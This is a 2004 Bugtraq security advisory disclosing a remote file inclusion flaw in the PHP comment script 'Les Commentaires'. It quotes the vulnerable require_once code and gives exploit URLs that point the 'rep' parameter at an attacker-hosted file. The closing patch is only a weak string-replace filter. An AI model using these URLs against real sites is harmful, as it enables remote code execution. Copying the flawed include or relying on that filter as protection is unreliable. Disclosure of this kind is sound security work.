[33386] in bugtraq
Les Commentaires (PHP) Include file
daemon@ATHENA.MIT.EDU (Himeur Nourredine)
Wed Feb 4 03:55:43 2004
Date: 3 Feb 2004 20:30:54 -0000
Message-ID: <20040203203054.7020.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Himeur Nourredine <lostnoobs@security-challenge.com>
To: bugtraq@securityfocus.com
Informations :
°°°°°°°°°°°°°°
Website : http://www.phpscripts-fr.net
Version : all
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
config/fonctions.lib.php
derniers_commentaires.php
admin.php
------------------------------------------------------------------
if (!isset($rep)) $rep = './';
require_once($rep.'config/fonctions.lib.php');
require_once($rep.'langues/'.$langue.'.lang.php');
------------------------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/config/fonctions.lib.php?rep=http://[attacker]/file.ext%3f
http://[target]/derniers_commentaires.php?rep=http://[attacker]/file.ext%3f
http://[target]/admin.php?rep=http://[attacker]/file.ext%3f
(the same but in local with = /langues/'.$langue.'.lang.php )
Patch :
°°°°°°°
You must to put a filter on the variable $rep and $langue.
like=
$rep= str_replace("..","lol",$rep);
AND
$rep= str_replace("://","lol",$rep);
(same with $langue)
Nourredine Himeur
www.security-challenge.com
